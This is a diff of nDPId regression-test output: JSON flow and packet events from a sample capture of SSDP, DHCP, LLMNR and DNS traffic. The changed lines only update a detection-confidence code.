{"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfhwAAAERhWTAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470104376203,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376203,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMIoAAAER0ubAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1470104376301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376301,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOpEAAAERyOzAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1470104376301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104376301,"pkt":"\/\/\/\/\/\/\/\/cD6s8PAHCABFAAFIDscAAP8Rq94AAAAA\/\/\/\/\/wBEAEMBNJGnAQEGAAYPv1sAAAAAAAAAAAAAAAAAAAAAAAAAAHA+rPDwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAXA+rPDwBzIEwKgD7TMEAHanAAwEU2hlbv8AAAAAAAAAAAAAAAAAAAAA"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1470104376816,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104376816,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiWgLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1470104377223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377223,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNGjoAgEGAOGY7R0AAIAAwKgDVsCoA1bAqHcBAAAAAMjTo5OjcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104377634,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377634,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRcAAAER5c7AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104377634,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLQAAAQRv8LAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1470104377720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1470104377720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1470104377734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 